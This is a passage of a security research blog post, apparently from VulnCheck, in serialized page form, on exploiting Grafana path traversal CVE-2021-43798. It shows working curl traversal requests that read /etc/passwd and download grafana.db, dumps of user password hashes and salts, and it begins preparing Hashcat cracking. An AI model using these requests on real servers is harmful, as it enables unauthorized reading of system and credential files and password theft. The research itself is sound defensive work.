http:\u002F\u002F10.9.49.222:3000\u002Fpublic\u002Fplugins\u002Fwelcome\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd\nroot:x:0:0:root:\u002Froot:\u002Fbin\u002Fash\nbin:x:1:1:bin:\u002Fbin:\u002Fsbin\u002Fnologin\ndaemon:x:2:2:daemon:\u002Fsbin:\u002Fsbin\u002Fnologin\nadm:x:3:4:adm:\u002Fvar\u002Fadm:\u002Fsbin\u002Fnologin\nlp:x:4:7:lp:\u002Fvar\u002Fspool\u002Flpd:\u002Fsbin\u002Fnologin\nsync:x:5:0:sync:\u002Fsbin:\u002Fbin\u002Fsync\nshutdown:x:6:0:shutdown:\u002Fsbin:\u002Fsbin\u002Fshutdown\nhalt:x:7:0:halt:\u002Fsbin:\u002Fsbin\u002Fhalt\nmail:x:8:12:mail:\u002Fvar\u002Fmail:\u002Fsbin\u002Fnologin\nnews:x:9:13:news:\u002Fusr\u002Flib\u002Fnews:\u002Fsbin\u002Fnologin\nuucp:x:10:14:uucp:\u002Fvar\u002Fspool\u002Fuucppublic:\u002Fsbin\u002Fnologin\noperator:x:11:0:operator:\u002Froot:\u002Fsbin\u002Fnologin\nman:x:13:15:man:\u002Fusr\u002Fman:\u002Fsbin\u002Fnologin\npostmaster:x:14:12:postmaster:\u002Fvar\u002Fmail:\u002Fsbin\u002Fnologin\ncron:x:16:16:cron:\u002Fvar\u002Fspool\u002Fcron:\u002Fsbin\u002Fnologin\nftp:x:21:21::\u002Fvar\u002Flib\u002Fftp:\u002Fsbin\u002Fnologin\nsshd:x:22:22:sshd:\u002Fdev\u002Fnull:\u002Fsbin\u002Fnologin\nat:x:25:25:at:\u002Fvar\u002Fspool\u002Fcron\u002Fatjobs:\u002Fsbin\u002Fnologin\nsquid:x:31:31:Squid:\u002Fvar\u002Fcache\u002Fsquid:\u002Fsbin\u002Fnologin\nxfs:x:33:33:X Font 
Server:\u002Fetc\u002FX11\u002Ffs:\u002Fsbin\u002Fnologin\ngames:x:35:35:games:\u002Fusr\u002Fgames:\u002Fsbin\u002Fnologin\ncyrus:x:85:12::\u002Fusr\u002Fcyrus:\u002Fsbin\u002Fnologin\nvpopmail:x:89:89::\u002Fvar\u002Fvpopmail:\u002Fsbin\u002Fnologin\nntp:x:123:123:NTP:\u002Fvar\u002Fempty:\u002Fsbin\u002Fnologin\nsmmsp:x:209:209:smmsp:\u002Fvar\u002Fspool\u002Fmqueue:\u002Fsbin\u002Fnologin\nguest:x:405:100:guest:\u002Fdev\u002Fnull:\u002Fsbin\u002Fnologin\nnobody:x:65534:65534:nobody:\u002F:\u002Fsbin\u002Fnologin\ngrafana:x:472:0:Linux User,,,:\u002Fhome\u002Fgrafana:\u002Fsbin\u002Fnologin\n",[886,107814,107815,107827,107832,107837,107842,107847,107852,107857,107862,107867,107872,107877,107882,107887,107892,107897,107902,107907,107912,107917,107922,107933,107938,107943,107948,107953,107958,107963,107968],{"__ignoreMap":219},[1373,107816,107817,107819,107821,107824],{"class":1375,"line":1376},[1373,107818,55482],{"class":2206},[1373,107820,2222],{"class":1391},[1373,107822,107823],{"class":2209}," --path-as-is",[1373,107825,107826],{"class":1391}," 
http:\u002F\u002F10.9.49.222:3000\u002Fpublic\u002Fplugins\u002Fwelcome\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd\n",[1373,107828,107829],{"class":1375,"line":220},[1373,107830,107831],{"class":2206},"root:x:0:0:root:\u002Froot:\u002Fbin\u002Fash\n",[1373,107833,107834],{"class":1375,"line":1266},[1373,107835,107836],{"class":2206},"bin:x:1:1:bin:\u002Fbin:\u002Fsbin\u002Fnologin\n",[1373,107838,107839],{"class":1375,"line":1852},[1373,107840,107841],{"class":2206},"daemon:x:2:2:daemon:\u002Fsbin:\u002Fsbin\u002Fnologin\n",[1373,107843,107844],{"class":1375,"line":4692},[1373,107845,107846],{"class":2206},"adm:x:3:4:adm:\u002Fvar\u002Fadm:\u002Fsbin\u002Fnologin\n",[1373,107848,107849],{"class":1375,"line":4724},[1373,107850,107851],{"class":2206},"lp:x:4:7:lp:\u002Fvar\u002Fspool\u002Flpd:\u002Fsbin\u002Fnologin\n",[1373,107853,107854],{"class":1375,"line":4756},[1373,107855,107856],{"class":2206},"sync:x:5:0:sync:\u002Fsbin:\u002Fbin\u002Fsync\n",[1373,107858,107859],{"class":1375,"line":4768},[1373,107860,107861],{"class":2206},"shutdown:x:6:0:shutdown:\u002Fsbin:\u002Fsbin\u002Fshutdown\n",[1373,107863,107864],{"class":1375,"line":4792},[1373,107865,107866],{"class":2206},"halt:x:7:0:halt:\u002Fsbin:\u002Fsbin\u002Fhalt\n",[1373,107868,107869],{"class":1375,"line":4798},[1373,107870,107871],{"class":2206},"mail:x:8:12:mail:\u002Fvar\u002Fmail:\u002Fsbin\u002Fnologin\n",[1373,107873,107874],{"class":1375,"line":4806},[1373,107875,107876],{"class":2206},"news:x:9:13:news:\u002Fusr\u002Flib\u002Fnews:\u002Fsbin\u002Fnologin\n",[1373,107878,107879],{"class":1375,"line":4817},[1373,107880,107881],{"class":2206},"uucp:x:10:14:uucp:\u002Fvar\u002Fspool\u002Fuucppublic:\u002Fsbin\u002Fnologin\n",[1373,107883,107884],{"class":1375,"line":4825},[1373,107885,107886],{"class":2206},"operator:x:11:0:operator:\u002Froot:\u002Fsbin\u002Fnologin\n",[1373,107888,107889],{"class":1375,"line":4835},[1373,107890,107891],{"class":2206},"man
:x:13:15:man:\u002Fusr\u002Fman:\u002Fsbin\u002Fnologin\n",[1373,107893,107894],{"class":1375,"line":4843},[1373,107895,107896],{"class":2206},"postmaster:x:14:12:postmaster:\u002Fvar\u002Fmail:\u002Fsbin\u002Fnologin\n",[1373,107898,107899],{"class":1375,"line":4849},[1373,107900,107901],{"class":2206},"cron:x:16:16:cron:\u002Fvar\u002Fspool\u002Fcron:\u002Fsbin\u002Fnologin\n",[1373,107903,107904],{"class":1375,"line":4877},[1373,107905,107906],{"class":2206},"ftp:x:21:21::\u002Fvar\u002Flib\u002Fftp:\u002Fsbin\u002Fnologin\n",[1373,107908,107909],{"class":1375,"line":4915},[1373,107910,107911],{"class":2206},"sshd:x:22:22:sshd:\u002Fdev\u002Fnull:\u002Fsbin\u002Fnologin\n",[1373,107913,107914],{"class":1375,"line":4931},[1373,107915,107916],{"class":2206},"at:x:25:25:at:\u002Fvar\u002Fspool\u002Fcron\u002Fatjobs:\u002Fsbin\u002Fnologin\n",[1373,107918,107919],{"class":1375,"line":4947},[1373,107920,107921],{"class":2206},"squid:x:31:31:Squid:\u002Fvar\u002Fcache\u002Fsquid:\u002Fsbin\u002Fnologin\n",[1373,107923,107924,107927,107930],{"class":1375,"line":4952},[1373,107925,107926],{"class":2206},"xfs:x:33:33:X",[1373,107928,107929],{"class":1391}," Font",[1373,107931,107932],{"class":1391}," 
Server:\u002Fetc\u002FX11\u002Ffs:\u002Fsbin\u002Fnologin\n",[1373,107934,107935],{"class":1375,"line":6776},[1373,107936,107937],{"class":2206},"games:x:35:35:games:\u002Fusr\u002Fgames:\u002Fsbin\u002Fnologin\n",[1373,107939,107940],{"class":1375,"line":6781},[1373,107941,107942],{"class":2206},"cyrus:x:85:12::\u002Fusr\u002Fcyrus:\u002Fsbin\u002Fnologin\n",[1373,107944,107945],{"class":1375,"line":7524},[1373,107946,107947],{"class":2206},"vpopmail:x:89:89::\u002Fvar\u002Fvpopmail:\u002Fsbin\u002Fnologin\n",[1373,107949,107950],{"class":1375,"line":7530},[1373,107951,107952],{"class":2206},"ntp:x:123:123:NTP:\u002Fvar\u002Fempty:\u002Fsbin\u002Fnologin\n",[1373,107954,107955],{"class":1375,"line":7546},[1373,107956,107957],{"class":2206},"smmsp:x:209:209:smmsp:\u002Fvar\u002Fspool\u002Fmqueue:\u002Fsbin\u002Fnologin\n",[1373,107959,107960],{"class":1375,"line":7571},[1373,107961,107962],{"class":2206},"guest:x:405:100:guest:\u002Fdev\u002Fnull:\u002Fsbin\u002Fnologin\n",[1373,107964,107965],{"class":1375,"line":7598},[1373,107966,107967],{"class":2206},"nobody:x:65534:65534:nobody:\u002F:\u002Fsbin\u002Fnologin\n",[1373,107969,107970,107973],{"class":1375,"line":7615},[1373,107971,107972],{"class":2206},"grafana:x:472:0:Linux",[1373,107974,107975],{"class":1391}," User,,,:\u002Fhome\u002Fgrafana:\u002Fsbin\u002Fnologin\n",[18,107977,107978,107979,107981,107982,107984,107985,107990],{},"The example above shows an attacker reading ",[886,107980,87550],{}," from the victim Grafana. Reading ",[886,107983,87550],{}," is essentially useless for an attacker, but VulnCheck has archived a large number of public CVE-2021-43798 exploits that do exactly that. 
Those exploits are useless, for anything other than vulnerability scanners and ",[47,107986,107989],{"href":107987,"rel":107988},"https:\u002F\u002Fhackerone.com\u002Freports\u002F1419213",[51],"bug bounty hunters",", because they don’t demonstrate a real security impact.",[18,107992,107993,107996,107997,108001,108002,10515,108005,14193,108010,108012,108013,108018],{},[295,107994,107995],{},"Some"," public CVE-2021-43798 exploits have tried to demonstrate real impact. ",[47,107998,36852],{"href":107999,"rel":108000},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fblob\u002F6727c1b344382fe2e56bb2a1c4343b09e40b64c8\u002Fmodules\u002Fauxiliary\u002Fscanner\u002Fhttp\u002Fgrafana_plugin_traversal.rb",[51],", for example, uses CVE-2021-43798 to download the server’s ",[886,108003,108004],{},"grafana.ini",[47,108006,108009],{"href":108007,"rel":108008},"https:\u002F\u002Fgithub.com\u002Fgrafana\u002Fgrafana\u002Fblob\u002Fmain\u002Fconf\u002Fdefaults.ini",[51],"configuration file",[886,108011,108004],{}," can potentially leak interesting secrets (e.g. ",[47,108014,108017],{"href":108015,"rel":108016},"https:\u002F\u002Fgrafana.com\u002Fdocs\u002Fgrafana\u002Flatest\u002Fsetup-grafana\u002Fconfigure-security\u002Fconfigure-authentication\u002Fokta\u002F",[51],"Okta OAuth2"," configuration), but a standard install using a default configuration is almost entirely devoid of anything useful to an attacker.",[18,108020,108021,108022,108026],{},"CVE-2021-43798 was a zero-day for only a short time. Grafana released an official patch on December 7, 2021. 
A couple of days later, the security industry became lost to the hysteria of ",[47,108023,83636],{"href":108024,"rel":108025},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FLog4Shell%E2%80%8B%E2%80%8B",[51],", and CVE-2021-43798 was pushed to the backburner before fading into obscurity.",[18,108028,108029,108030,108035],{},"But, a bit over a year later, thousands of servers remain vulnerable to CVE-2021-43798. A review of the approximately ",[47,108031,108034],{"href":108032,"rel":108033},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22Grafana%22",[51],"95,000"," Grafana instances indexed by Shodan found that 7,500 (about 8%) are still vulnerable.",[1925,108037,108038],{},[18,108039,108040],{},"Vulnerable Internet-Facing Grafana Instances",[11128,108042],{":labels":108043,":values":108044},"[\"8.0.0\",\"8.0.1\",\"8.0.2\",\"8.0.3\",\"8.0.4\",\"8.0.5\",\"8.0.6\",\"8.1.0\",\"8.1.1\",\"8.1.2\",\"8.1.3\",\"8.1.4\",\"8.1.5\",\"8.1.6\",\"8.1.7\",\"8.2.0\",\"8.2.1\",\"8.2.2\",\"8.2.3\",\"8.2.4\",\"8.2.5\",\"8.2.6\",\"8.3.0\"]","[213,121,143,482,352,321,687,180,401,729,270,107,518,120,58,255,440,577,526,186,447,206,296]",[18,108046,108047,108048,108051,108052,108057,108058,108062],{},"CVE-2021-43798 has never been publicly linked to a named adversary. You won’t find it in any threat group reports, botnet rundowns, or the ",[47,108049,100825],{"href":2864,"rel":108050},[51],". But it does appear to be actively exploited. ",[47,108053,108056],{"href":108054,"rel":108055},"https:\u002F\u002Fwww.fortiguard.com\u002Fencyclopedia\u002Fips\u002F51075",[51],"FortiGuard Labs IP Threat Encyclopedia"," shows hundreds of CVE-2021-43798 exploitation attempts pers day. 
",[47,108059,86601],{"href":108060,"rel":108061},"https:\u002F\u002Fviz.greynoise.io\u002Fquery\u002F?gnql=raw_data.web.paths%3A%22%2Fpublic%2Fplugins%2F%22%20classification%3Amalicious",[51]," also shows a number of malicious IP addresses probing for vulnerable hosts:",[18,108064,108065],{},[68,108066],{":width":10862,"alt":108067,"src":108068},"Grafana Probes","\u002Fblog\u002Fgrafana-cve-2021-43798\u002Fgreynoise-grafana.png",[18,108070,108071,108072,108075],{},"With thousands of vulnerable servers and, what appears to be, active probing for the vulnerability, it left us wondering if there was more to this vulnerability. At VulnCheck, our ",[47,108073,91940],{"href":45535,"rel":108074},[51]," program has had decent success chaining information leak vulnerabilities with authenticated attacks to achieve initial access. Could CVE-2021-43798 be one of those useful information leaks?",[61,108077,108079],{"id":108078},"finding-a-more-useful-information-leak","Finding a More Useful Information Leak",[18,108081,108082,108083,982,108085,108088,108089,108092,108093,108095],{},"As mentioned, early exploits leaked ",[886,108084,87550],{},[886,108086,108087],{},"\u002Fetc\u002Fgrafana\u002Fgrafana.ini"," (or a variant of that path), but they weren’t likely to be useful for establishing initial access to the Grafana system. Another early suggestion was to leak SSH keys, but that isn’t a realistic target either. A secure Grafana install will be executed as a low-privileged ",[886,108090,108091],{},"grafana"," user. 
Access to SSH keys shouldn’t be possible, and, even if it was, there is little reason for a Grafana server to contain any useful SSH ",[1131,108094,16703],{}," keys.",[18,108097,108098,108099,108104],{},"There is ",[47,108100,108103],{"href":108101,"rel":108102},"https:\u002F\u002Fnusgreyhats.org\u002Fposts\u002Fwriteups\u002Fa-not-so-deep-dive-in-to-grafana-cve-2021-43798\u002F",[51],"one"," early writeup that discuss exfiltrating the SQLite database that backs Grafana. An SQLite database is just a file, so an attacker using CVE-2021-43798 can grab a copy of the database. As you can see below, the database contains a bunch of interesting looking tables.",[1354,108106,108108],{"className":31740,"code":108107,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -o grafana.db --path-as-is http:\u002F\u002F10.9.49.222:3000\u002Fpublic\u002Fplugins\u002Fwelcome\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fvar\u002Flib\u002Fgrafana\u002Fgrafana.db\n  % Total   % Received % Xferd  Average Speed   Time    Time    Time  Current\n                                Dload  Upload   Total   Spent   Left  Speed\n100 3544k  100 3544k    0   0   627k    0  0:00:05  0:00:05 --:--:--  662k\nalbinolobster@mournland:~$ sqlite3 grafana.db\nSQLite version 3.31.1 2020-01-27 19:55:54\nEnter \".help\" for usage hints.\nsqlite> .tables\nalert                       login_attempt            \nalert_configuration         migration_log            \nalert_instance              ngalert_configuration    \nalert_notification          org                      \nalert_notification_state    org_user                 \nalert_rule                  playlist                 \nalert_rule_tag              playlist_item            \nalert_rule_version          plugin_setting           \nannotation                  preferences              \nannotation_tag              quota                    \napi_key                     server_lock              \ncache_data          
        session                  \ndashboard                   short_url                \ndashboard_acl               star                     \ndashboard_provisioning      tag                      \ndashboard_snapshot          team                     \ndashboard_tag               team_member              \ndashboard_version           temp_user                \ndata_source                 test_data                \nkv_store                    user                     \nlibrary_element             user_auth                \nlibrary_element_connection  user_auth_token          \nsqlite>\n",[886,108109,108110,108126,108162,108182,108216,108225,108237,108253,108262,108272,108282,108292,108303,108314,108324,108334,108345,108356,108367,108376,108387,108397,108408,108418,108428,108438,108448,108458,108468,108478,108489],{"__ignoreMap":219},[1373,108111,108112,108114,108116,108118,108121,108123],{"class":1375,"line":1376},[1373,108113,55482],{"class":2206},[1373,108115,2222],{"class":1391},[1373,108117,39692],{"class":2209},[1373,108119,108120],{"class":1391}," grafana.db",[1373,108122,107823],{"class":2209},[1373,108124,108125],{"class":1391}," http:\u002F\u002F10.9.49.222:3000\u002Fpublic\u002Fplugins\u002Fwelcome\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fvar\u002Flib\u002Fgrafana\u002Fgrafana.db\n",[1373,108127,108128,108131,108134,108137,108140,108142,108145,108148,108151,108154,108157,108159],{"class":1375,"line":220},[1373,108129,108130],{"class":2206},"  %",[1373,108132,108133],{"class":1391}," Total",[1373,108135,108136],{"class":1391},"   %",[1373,108138,108139],{"class":1391}," Received",[1373,108141,78784],{"class":1391},[1373,108143,108144],{"class":1391}," Xferd",[1373,108146,108147],{"class":1391},"  Average",[1373,108149,108150],{"class":1391}," Speed",[1373,108152,108153],{"class":1391},"   Time",[1373,108155,108156],{"class":1391},"    Time",[1373,108158,108156],{"class":1391},[1373,108160,108161],{"class":1391},"  
Current\n",[1373,108163,108164,108167,108170,108173,108176,108179],{"class":1375,"line":1266},[1373,108165,108166],{"class":2206},"                                Dload",[1373,108168,108169],{"class":1391},"  Upload",[1373,108171,108172],{"class":1391},"   Total",[1373,108174,108175],{"class":1391},"   Spent",[1373,108177,108178],{"class":1391},"   Left",[1373,108180,108181],{"class":1391},"  Speed\n",[1373,108183,108184,108186,108189,108192,108194,108197,108200,108203,108205,108208,108210,108213],{"class":1375,"line":1852},[1373,108185,48221],{"class":2206},[1373,108187,108188],{"class":1391}," 3544k",[1373,108190,108191],{"class":5467},"  100",[1373,108193,108188],{"class":1391},[1373,108195,108196],{"class":5467},"    0",[1373,108198,108199],{"class":5467},"   0",[1373,108201,108202],{"class":1391},"   627k",[1373,108204,108196],{"class":5467},[1373,108206,108207],{"class":1391},"  0:00:05",[1373,108209,108207],{"class":1391},[1373,108211,108212],{"class":2209}," --:--:--",[1373,108214,108215],{"class":1391},"  662k\n",[1373,108217,108218,108220,108222],{"class":1375,"line":4692},[1373,108219,55482],{"class":2206},[1373,108221,69543],{"class":1391},[1373,108223,108224],{"class":1391}," 
grafana.db\n",[1373,108226,108227,108229,108231,108233,108235],{"class":1375,"line":4724},[1373,108228,69550],{"class":2206},[1373,108230,45880],{"class":1391},[1373,108232,69555],{"class":5467},[1373,108234,69558],{"class":1391},[1373,108236,69561],{"class":1391},[1373,108238,108239,108241,108243,108245,108247,108249,108251],{"class":1375,"line":4756},[1373,108240,55798],{"class":2206},[1373,108242,4883],{"class":1387},[1373,108244,69570],{"class":1391},[1373,108246,183],{"class":1387},[1373,108248,55807],{"class":1391},[1373,108250,69577],{"class":1391},[1373,108252,69580],{"class":1391},[1373,108254,108255,108257,108259],{"class":1375,"line":4768},[1373,108256,69585],{"class":2206},[1373,108258,69588],{"class":4640},[1373,108260,108261],{"class":1391},".tables\n",[1373,108263,108264,108266,108269],{"class":1375,"line":4792},[1373,108265,99066],{"class":2206},[1373,108267,108268],{"class":1391},"                       login_attempt",[1373,108270,108271],{"class":4640},"            \n",[1373,108273,108274,108277,108280],{"class":1375,"line":4798},[1373,108275,108276],{"class":2206},"alert_configuration",[1373,108278,108279],{"class":1391},"         migration_log",[1373,108281,108271],{"class":4640},[1373,108283,108284,108287,108290],{"class":1375,"line":4806},[1373,108285,108286],{"class":2206},"alert_instance",[1373,108288,108289],{"class":1391},"              ngalert_configuration",[1373,108291,47181],{"class":4640},[1373,108293,108294,108297,108300],{"class":1375,"line":4817},[1373,108295,108296],{"class":2206},"alert_notification",[1373,108298,108299],{"class":1391},"          org",[1373,108301,108302],{"class":4640},"                      \n",[1373,108304,108305,108308,108311],{"class":1375,"line":4825},[1373,108306,108307],{"class":2206},"alert_notification_state",[1373,108309,108310],{"class":1391},"    org_user",[1373,108312,108313],{"class":4640},"                 
\n",[1373,108315,108316,108319,108322],{"class":1375,"line":4835},[1373,108317,108318],{"class":2206},"alert_rule",[1373,108320,108321],{"class":1391},"                  playlist",[1373,108323,108313],{"class":4640},[1373,108325,108326,108329,108332],{"class":1375,"line":4843},[1373,108327,108328],{"class":2206},"alert_rule_tag",[1373,108330,108331],{"class":1391},"              playlist_item",[1373,108333,108271],{"class":4640},[1373,108335,108336,108339,108342],{"class":1375,"line":4849},[1373,108337,108338],{"class":2206},"alert_rule_version",[1373,108340,108341],{"class":1391},"          plugin_setting",[1373,108343,108344],{"class":4640},"           \n",[1373,108346,108347,108350,108353],{"class":1375,"line":4877},[1373,108348,108349],{"class":2206},"annotation",[1373,108351,108352],{"class":1391},"                  preferences",[1373,108354,108355],{"class":4640},"              \n",[1373,108357,108358,108361,108364],{"class":1375,"line":4915},[1373,108359,108360],{"class":2206},"annotation_tag",[1373,108362,108363],{"class":1391},"              quota",[1373,108365,108366],{"class":4640},"                    \n",[1373,108368,108369,108371,108374],{"class":1375,"line":4931},[1373,108370,63630],{"class":2206},[1373,108372,108373],{"class":1391},"                     server_lock",[1373,108375,108355],{"class":4640},[1373,108377,108378,108381,108384],{"class":1375,"line":4947},[1373,108379,108380],{"class":2206},"cache_data",[1373,108382,108383],{"class":1391},"                  session",[1373,108385,108386],{"class":4640},"                  \n",[1373,108388,108389,108392,108395],{"class":1375,"line":4952},[1373,108390,108391],{"class":2206},"dashboard",[1373,108393,108394],{"class":1391},"                   short_url",[1373,108396,49384],{"class":4640},[1373,108398,108399,108402,108405],{"class":1375,"line":6776},[1373,108400,108401],{"class":2206},"dashboard_acl",[1373,108403,108404],{"class":1391},"               star",[1373,108406,108407],{"class":4640},"      
               \n",[1373,108409,108410,108413,108416],{"class":1375,"line":6781},[1373,108411,108412],{"class":2206},"dashboard_provisioning",[1373,108414,108415],{"class":1391},"      tag",[1373,108417,108302],{"class":4640},[1373,108419,108420,108423,108426],{"class":1375,"line":7524},[1373,108421,108422],{"class":2206},"dashboard_snapshot",[1373,108424,108425],{"class":1391},"          team",[1373,108427,108407],{"class":4640},[1373,108429,108430,108433,108436],{"class":1375,"line":7530},[1373,108431,108432],{"class":2206},"dashboard_tag",[1373,108434,108435],{"class":1391},"               team_member",[1373,108437,108355],{"class":4640},[1373,108439,108440,108443,108446],{"class":1375,"line":7546},[1373,108441,108442],{"class":2206},"dashboard_version",[1373,108444,108445],{"class":1391},"           temp_user",[1373,108447,49384],{"class":4640},[1373,108449,108450,108453,108456],{"class":1375,"line":7571},[1373,108451,108452],{"class":2206},"data_source",[1373,108454,108455],{"class":1391},"                 test_data",[1373,108457,49384],{"class":4640},[1373,108459,108460,108463,108466],{"class":1375,"line":7598},[1373,108461,108462],{"class":2206},"kv_store",[1373,108464,108465],{"class":1391},"                    user",[1373,108467,108407],{"class":4640},[1373,108469,108470,108473,108476],{"class":1375,"line":7615},[1373,108471,108472],{"class":2206},"library_element",[1373,108474,108475],{"class":1391},"             user_auth",[1373,108477,49384],{"class":4640},[1373,108479,108480,108483,108486],{"class":1375,"line":7635},[1373,108481,108482],{"class":2206},"library_element_connection",[1373,108484,108485],{"class":1391},"  user_auth_token",[1373,108487,108488],{"class":4640},"          \n",[1373,108490,108491,108493],{"class":1375,"line":7640},[1373,108492,69585],{"class":2206},[1373,108494,6765],{"class":4640},[18,108496,108497,108498,108500,108501,1246,108504,1255,108506,108508,108509,108511],{},"The aforementioned write-up focuses on the 
",[886,108499,108452],{}," table. That seems like an odd choice when there are other juicy-looking table names like ",[886,108502,108503],{},"user_auth_token",[886,108505,63630],{},[886,108507,4664],{},". But it turns out that Grafana does an excellent job of hashing sensitive data with large random values to make it “impossible” for attackers to quickly recover credentials. The sole exception appears to be the data stored in the ",[886,108510,108452],{}," table.",[18,108513,108514,108515,108511],{},"Grafana, being a data visualization tool, needs external sources of data, such as databases. Grafana needs to know how to authenticate with those databases. Those credentials are stored encrypted (but easily decrypted) in the ",[886,108516,108452],{},[18,108518,108519,108520,108523,108524,108526,108527,108529],{},"Without going into specifics (I’d suggest reading the linked ",[1131,108521,108522],{},"A (not so deep) Dive into Grafana CVE-2021-43798",", if you are interested), attackers who can access the ",[886,108525,108004],{}," file and ",[886,108528,108452],{}," table can trivially decrypt the passwords to Grafana’s external data sources. That’s quite interesting, but likely has three significant drawbacks from an initial access perspective:",[1789,108531,108532,108535,108538],{},[25,108533,108534],{},"The data sources are less likely to be directly reachable over the internet. Exposing Grafana to the internet is unwise, but likely done intentionally. To expose a production database to the internet is a grave error. The expectation is that many data sources won’t be remotely accessible by an attacker from the internet.",[25,108536,108537],{},"Even if the attacker can reach the data source, only certain types of data sources are going to be useful for initial access purposes. For example, the attacker would welcome access to a PostgreSQL database because it contains features that might allow an attacker to execute arbitrary OS commands. 
But a Grafana whose only data source is CloudWatch won’t offer that same type of functionality.",[25,108539,108540],{},"Finally, let’s say an attacker can access a PostgreSQL data source. Grafana tells administrators to provide low-privileged\u002Fread-only access to Grafana for security reasons. A properly configured account will block Grafana from abusing the command execution feature.",[18,108542,108543,108544,108546,108547,108552],{},"So while ",[886,108545,108452],{}," is interesting (and even featured on a ",[47,108548,108551],{"href":108549,"rel":108550},"https:\u002F\u002Fwww.hackthebox.com\u002F",[51],"HackTheBox"," target), the drawbacks are too significant.",[61,108554,108556],{"id":108555},"guessing-credentials","Guessing Credentials",[18,108558,108559,108560,108562,108563,108565],{},"Instead, we thought another table offered more realistic chances for obtaining additional access. Unsurprisingly, it’s the ",[886,108561,39933],{}," table. The ",[886,108564,39933],{}," table contains usernames, hashed passwords, and salts:",[1354,108567,108570],{"className":108568,"code":108569,"language":1359,"meta":219},[1357],"sqlite> select * from user;\nid|version|login|email|name|password|salt|rands|company|org_id|is_admin|email_verified|theme|created|updated|help_flags1|last_seen_at|is_disabled\n1|0|admin|admin@localhost||e21680070fb3a72d8cac29819eb74ddbee669a9d362dea5c4674d8287e4a1df22424fcdd00ab0cc8230d4249296adc2adca8|NcgfTdzwPc|wXslOqTqT0||1|1|0||2023-02-09 23:12:45|2023-02-13 21:25:51|0|2023-02-13 21:25:26|0\n2|0|viewer|viewer|Jake|18e6160a5e7e03a7dea259195b27543c2d1b515e4490867c73ffb6214d08f77163ecc0f58321a40deb300ec563c15a327733|13CdHYK4Xl|z5w6xlWQWI||1|0|0||2023-02-10 18:02:31|2023-02-13 21:27:21|0|2023-02-13 21:26:56|0\n3|0|ro|ro|ro|20ae2e2828c004ef4638f6d490a23aa9956cc4bfeb1db60abd18930f97099782037c6861518b466e20addc36dfda5f564d78|bhhVgTns9o|w2lzkKgwWN||1|0|0||2023-02-10 18:17:14|2023-02-13 21:26:39|0|2023-02-13 
21:26:24|0\n",[886,108571,108569],{"__ignoreMap":219},[18,108573,108574,108575,4606],{},"The hashes are created using PBKDF2-HMAC-SHA256. See lines 145-148 of ",[47,108576,108579],{"href":108577,"rel":108578},"https:\u002F\u002Fgithub.com\u002Fgrafana\u002Fgrafana\u002Fblob\u002Fmain\u002Fpkg\u002Futil\u002Fencryption.go#L145",[51],"grafana\u002Fblob\u002Fmain\u002Fpkg\u002Futil\u002Fencryption.go",[1354,108581,108583],{"className":19022,"code":108582,"language":19024,"meta":219,"style":219},"\u002F\u002F Key needs to be 32bytes\nfunc encryptionKeyToBytes(secret, salt string) ([]byte, error) {\n    return pbkdf2.Key([]byte(secret), []byte(salt), 10000, 32, sha256.New), nil\n}\n",[886,108584,108585,108590,108625,108679],{"__ignoreMap":219},[1373,108586,108587],{"class":1375,"line":1376},[1373,108588,108589],{"class":4630},"\u002F\u002F Key needs to be 32bytes\n",[1373,108591,108592,108594,108597,108599,108602,108604,108607,108609,108611,108614,108616,108618,108621,108623],{"class":1375,"line":220},[1373,108593,19088],{"class":1397},[1373,108595,108596],{"class":7297}," encryptionKeyToBytes",[1373,108598,1384],{"class":1383},[1373,108600,108601],{"class":19096},"secret",[1373,108603,5437],{"class":1383},[1373,108605,108606],{"class":19096}," salt",[1373,108608,15757],{"class":7293},[1373,108610,2230],{"class":1383},[1373,108612,108613],{"class":1383}," ([]",[1373,108615,82979],{"class":7293},[1373,108617,5437],{"class":1383},[1373,108619,108620],{"class":7293}," error",[1373,108622,2230],{"class":1383},[1373,108624,4765],{"class":1383},[1373,108626,108627,108629,108632,108634,108636,108638,108640,108642,108644,108646,108648,108650,108652,108655,108657,108660,108662,108665,108667,108670,108672,108674,108676],{"class":1375,"line":1266},[1373,108628,7340],{"class":4636},[1373,108630,108631],{"class":4640}," 
pbkdf2",[1373,108633,59],{"class":1383},[1373,108635,15996],{"class":7297},[1373,108637,82976],{"class":1383},[1373,108639,82979],{"class":7293},[1373,108641,1384],{"class":1383},[1373,108643,108601],{"class":4640},[1373,108645,15534],{"class":1383},[1373,108647,66801],{"class":1383},[1373,108649,82979],{"class":7293},[1373,108651,1384],{"class":1383},[1373,108653,108654],{"class":4640},"salt",[1373,108656,15534],{"class":1383},[1373,108658,108659],{"class":5467}," 10000",[1373,108661,5437],{"class":1383},[1373,108663,108664],{"class":5467}," 32",[1373,108666,5437],{"class":1383},[1373,108668,108669],{"class":4640}," sha256",[1373,108671,59],{"class":1383},[1373,108673,97132],{"class":4640},[1373,108675,15534],{"class":1383},[1373,108677,108678],{"class":7054}," nil\n",[1373,108680,108681],{"class":1375,"line":1852},[1373,108682,1855],{"class":1383},[18,108684,108685,108686,108691],{},"PBKDF2-HMAC-SHA256 is an algorithm understood by ",[47,108687,108690],{"href":108688,"rel":108689},"https:\u002F\u002Fhashcat.net\u002Fhashcat\u002F",[51],"Hashcat",", the password cracking tool. The Grafana user table just needs to be transformed into a format that Hashcat can read. 
